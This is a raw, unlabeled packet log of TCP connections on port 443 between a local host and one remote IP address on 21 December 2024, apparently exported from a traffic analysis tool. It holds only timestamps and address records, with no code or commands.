                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.072060108 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.072104931 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.072145939 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.072175026 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.072221994 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.072222948 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.092451096 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.092495918 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.092545033 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.092575073 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.092602968 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.092623949 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.395343065 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.395381927 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.395452976 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.395908117 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.395992041 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.424041986 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.424120903 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.424144983 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.424184084 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.424242973 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.424264908 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.450618029 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.450668097 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.450723886 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.450742006 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.450771093 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.450790882 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.476059914 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.476106882 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.476140022 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.476159096 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.476193905 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.476383924 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.500484943 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.500560045 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.500566959 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.500588894 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.500622034 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.500660896 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.528731108 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.528779984 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.528810024 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.528825045 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.528866053 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.529036999 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.556154013 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.556200027 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.556253910 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.556324005 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.556375980 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.556375980 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.579389095 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.579437017 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.579454899 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.579500914 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.579515934 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.579787016 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.612426996 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.612483025 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.612520933 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.612590075 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.612624884 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.612648010 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.627964973 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.628012896 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.628051996 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.628070116 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.628098011 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.628114939 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.637324095 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.637372017 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.637404919 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.637424946 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.637453079 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.637474060 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.646781921 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.646823883 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.646888018 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.646903038 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.646938086 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.646954060 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.655704021 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.655747890 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.655808926 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.655810118 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.655829906 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.655881882 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.665002108 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.665066957 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.665098906 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.665112019 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.665143013 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.665162086 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.673244953 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.673310995 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.673324108 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.673345089 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.673369884 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.673387051 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.683307886 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.683367968 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.683412075 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.683433056 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.683456898 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.683476925 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.691550016 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.691591978 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.691629887 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.691643000 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.691668034 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.691688061 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.701008081 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.701069117 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.701100111 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.701113939 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.701142073 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.701162100 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.710349083 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.710390091 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.710406065 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.710462093 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.710475922 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.710541964 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.719518900 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.719588041 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.719609976 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.719671965 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.740330935 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.740381956 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.740442991 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.740480900 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.740504026 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.740520954 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.748370886 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.748413086 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.748465061 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.748527050 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.748562098 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.748728037 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.756629944 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.756699085 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.756735086 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.756750107 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.756773949 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.756797075 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.756952047 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.757042885 CET4434970462.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:04.757102013 CET49704443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:06.621886015 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:06.621972084 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:06.622044086 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:06.634170055 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:06.634188890 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.207681894 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.207794905 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.212090015 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.212109089 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.212451935 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.238033056 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.283343077 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.732640982 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.782421112 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.782445908 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.829293966 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.852380037 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.852417946 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.852437019 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.852454901 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.852488995 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.852494955 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.852508068 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.852535963 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.852566957 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.907435894 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971117973 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971196890 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971214056 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971240044 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971263885 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971282005 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971301079 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971301079 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971343994 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971358061 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:08.971412897 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.019793034 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.019814968 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.019854069 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.019886971 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.019901037 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.019974947 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.019987106 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.020047903 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.141345024 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.141398907 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.141539097 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.141539097 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.141572952 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.141621113 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.181020021 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.181067944 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.181212902 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.181212902 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.181247950 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.181307077 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.208811998 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.208859921 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.209018946 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.209018946 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.209049940 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.209108114 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.240921021 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.240971088 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.241020918 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.241039038 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.241079092 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.241117001 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.241244078 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.241384983 CET4434970862.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.241447926 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.260867119 CET49708443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.636857986 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.636976004 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.637094975 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.637434006 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:09.637466908 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.025209904 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.031574011 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.031661034 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.549269915 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.594922066 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669419050 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669436932 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669461966 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669488907 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669496059 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669502974 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669519901 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669562101 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669576883 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.669612885 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.788155079 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.788239956 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.788249016 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.788268089 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.788326979 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.837693930 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.837734938 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.837800980 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.837809086 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.837940931 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.957804918 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.957849026 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.957890987 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.957899094 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.957946062 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.989041090 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.989083052 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.989111900 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.989124060 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:11.989159107 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.036979914 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.037066936 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.037077904 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.037110090 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.037137032 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.037161112 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.135087967 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.135170937 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.135173082 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.135215998 CET4434971062.182.21.105192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.135240078 CET49710443192.168.2.562.182.21.105
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:12.135266066 CET49710443192.168.2.562.182.21.105
